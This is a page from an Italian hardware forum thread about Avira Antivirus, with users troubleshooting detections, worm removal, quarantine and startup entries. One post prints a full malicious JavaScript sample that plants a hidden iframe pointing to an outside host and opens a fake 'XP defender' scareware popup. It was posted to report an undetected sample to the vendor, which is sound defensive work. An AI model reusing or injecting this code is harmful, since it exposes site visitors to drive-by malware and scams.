Hardware Upgrade Forum

Hardware Upgrade Forum (https://www.hwupgrade.it/forum/index.php)
-   Guida all'uso dei Programmi (https://www.hwupgrade.it/forum/forumdisplay.php?f=122)
-   -   Avira Antivirus 9/10 (https://www.hwupgrade.it/forum/showthread.php?t=1514684)


Dark_Programmer 09-06-2008 22:41

Quote:

Originariamente inviato da juninho85 (Messaggio 22828841)
scusa de che?!:fagiano:

che non l'avevo capito prima..

Pat77 09-06-2008 23:18

Quote:

Originariamente inviato da juninho85 (Messaggio 22828841)
scusa de che?!:fagiano:

Arg il gufo vestito d'italia :O non è che porti sfiga? :D

lancetta 10-06-2008 01:06

Quote:

Originariamente inviato da Pat77 (Messaggio 22829737)
Arg il gufo vestito d'italia :O non è che porti sfiga? :D

Junhi cambia avatar che ne abbiamo beccate tre... :D

juninho85 10-06-2008 07:40

Quote:

Originariamente inviato da GmG (Messaggio 22821988)
La sbornia è passata :D :sofico:

Ho inviato alcuni campioni di b.js e questo è il risultato



:)

questo ancora non viene rilevato :muro:
Codice:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://exec51.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
window.open("http://www.advancedxpdefender.com/sysscan/f3dd61256dd53c3ff34e20b256b505fa/1/",'defender',"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1024,height=600,top=10,left=10");
}
catch(e)
{
};
}


juninho85 10-06-2008 07:40

Quote:

Originariamente inviato da lancetta (Messaggio 22830426)
Junhi cambia avatar che ne abbiamo beccate tre... :D

Quote:

Originariamente inviato da Pat77 (Messaggio 22829737)
Arg il gufo vestito d'italia :O non è che porti sfiga? :D

siate ottimisti:O

lo_straniero 10-06-2008 11:55

avira non mi riesce a eliminare alcuni worm :cry: :cry: :cry:

worm/ircbot.43803

epa 10-06-2008 12:04

Cioè ti si ripresentano sempre o non ti da proprio l'opzione elimina?
Se si ripresentano è sufficiente che disattivi temporaneamente il ripristino di sistema e magari clicchi su pulitura disco ed elimini tutti i file di backup, così non dovrebbe più tornare.
Se invece non ti da l'opzione prova con qualche scansione online, o magari anche spyware terminator o a-squared...:confused:

nyquist82 10-06-2008 13:11

Quote:

Originariamente inviato da juninho85 (Messaggio 22830904)
siate ottimisti:O

:help: :tie: :huh:

p.s: hai spaginato.

Pat77 10-06-2008 13:15

Quote:

Originariamente inviato da lo_straniero (Messaggio 22834949)
avira non mi riesce a eliminare alcuni worm :cry: :cry: :cry:

worm/ircbot.43803

In che senso? Si riformano all'avvio, non gli elimina? Devi essere un po' più preciso.

juninho85 10-06-2008 14:41

Quote:

Originariamente inviato da nyquist82 (Messaggio 22836258)
:help: :tie: :huh:

p.s: hai spaginato.

è un post normale...tra l'altro non ho nemmeno cambiato signa,non capisco perchè scazzi in questo modo :D

GmG 10-06-2008 14:43

Quote:

Originariamente inviato da juninho85 (Messaggio 22837814)
è un post normale...tra l'altro non ho nemmeno cambiato signa,non capisco perchè scazzi in questo modo :D

Cambia quote con code nel post con lo script.

Ps. Ho inviato altri script tra cui il tuo che dovrebbe venire identificato come HTML/Iframe.ZI

juninho85 10-06-2008 14:47

Quote:

Originariamente inviato da GmG (Messaggio 22837858)
Cambia quote con code nel post con lo script.

Ps. Ho inviato altri script tra cui il tuo che dovrebbe venire identificato come HTML/Iframe.ZI

pensavo fosse un altro il post incriminato!:doh:
in quale VDF verrà rilasciato?

GmG 10-06-2008 14:51

Quote:

Originariamente inviato da juninho85 (Messaggio 22837910)
pensavo fosse un altro il post incriminato!:doh:
in quale VDF verrà rilasciato?

Nella mail non è specificato (c'è scritto in uno dei prossimi).
Di solito in questi casi ho notato che è il primo del giorno successivo.

waikiki 10-06-2008 17:16

scusate come scannerizzare una determinata cartella?
Gli object che vanno in quarantine devo essere cancellati manualmente se si ritiene siano effettivamente malware?
Grazie

_MaRcO_ 10-06-2008 17:48

Quote:

Originariamente inviato da waikiki (Messaggio 22840474)
scusate come scannerizzare una determinata cartella?
Gli object che vanno in quarantine devo essere cancellati manualmente se si ritiene siano effettivamente malware?
Grazie

tasto dx sulla cartella e clicca "scan selected files with AntiVir"

CiAo

waikiki 10-06-2008 18:31

gli object detection in quarantine?
Mi capita che se faccio lo scan generale(local drives) non mi trova nulla, se faccio lo scan di una cartella cioè
C:\Documents and Settings\****\Impostazioni locali\Temp

mi trova una detection
TR/Drop.Age.30544.A

come mai?
che devo fare allora andarmi a selezionare tutte le cartelle dii C: ed analizzarla una ad una?

Il Castiglio 10-06-2008 19:35

Quote:

Originariamente inviato da waikiki (Messaggio 22841576)
gli object detection in quarantine?
Mi capita che se faccio lo scan generale(local drives) non mi trova nulla, se faccio lo scan di una cartella cioè
C:\Documents and Settings\****\Impostazioni locali\Temp

mi trova una detection
TR/Drop.Age.30544.A

come mai?
che devo fare allora andarmi a selezionare tutte le cartelle dii C: ed analizzarla una ad una?

Visto che te lo ha rilevato fra i Temporanei, forse quando hai fatto la scansione generale non c'era ;)

waikiki 10-06-2008 19:39

bah l'ho fatto subito dopo...

ho una cosa strana ,cmq deselezionata dallo startup, in avvio in msconfig. Come mai cmq rimane negli elementi di avvio da spoter selezionare?

E' un file che antivir mi ha cancellato proprio nella cartella temporanea.

Il Castiglio 10-06-2008 21:53

Quote:

Originariamente inviato da waikiki (Messaggio 22842570)
bah l'ho fatto subito dopo...

ho una cosa strana ,cmq deselezionata dallo startup, in avvio in msconfig. Come mai cmq rimane negli elementi di avvio da spoter selezionare?

E' un file che antivir mi ha cancellato proprio nella cartella temporanea.

Perché hai cancellato il file, ma non la chiave di registro ... mentre MSConfig permette solo di deselezionarli, con un programmillo come ad esempio Start Up Tool, puoi anche ripulire i programmi che si avviano con Windows

86alessio86 10-06-2008 22:59

Risono qua..
Problema è gia duevolteche mi esce una finestra di errore con scritto
C\programmi\avira\ricimage.dll non può essere modificato o è stato eliminato
the avwsc.exe non può essere caricato.controlalre l'installazione(la frase è in inglese)
Che posso fare?o meglio perchè succede ciò?due volte e due volte succede=


Tutti gli orari sono GMT +1. Ora sono le: 21:23.

Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd.
Hardware Upgrade S.r.l.